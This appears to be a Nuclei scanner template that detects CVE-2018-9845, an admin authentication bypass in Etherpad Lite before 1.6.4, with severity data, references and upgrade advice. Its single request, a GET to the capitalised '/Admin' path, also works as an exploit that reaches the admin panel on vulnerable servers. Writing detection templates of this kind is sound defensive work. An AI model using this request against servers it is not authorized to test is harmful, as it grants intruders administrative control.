id: CVE-2018-9845 info: name: Etherpad Lite <1.6.4 - Admin Authentication Bypass author: philippedelteil severity: critical description: Etherpad Lite before 1.6.4 is exploitable for admin access. remediation: | Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability. reference: - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b - https://nvd.nist.gov/vuln/detail/CVE-2018-9845 - https://github.com/ether/etherpad-lite/blob/develop/CHANGELOG.md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.01393 epss-percentile: 0.84931 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: etherpad product: etherpad_lite tags: cve,cve2018,etherpad,auth-bypass http: - method: GET path: - "{{BaseURL}}/Admin" host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: word part: body words: - "Etherpad version" - "Plugin manager" - "Installed parts" condition: and - type: status status: - 200 # digest: 490a00463044022064e24e5db976d25a5cc0d83933679ec6729f839382918a8c12e793a9a013fdeb022052a6f0d05bbd19da9f4e47b7a66f29f190c59b6a67a88c5313d869a1bcadfb25:922c64590222798bb761d5b6d8e72950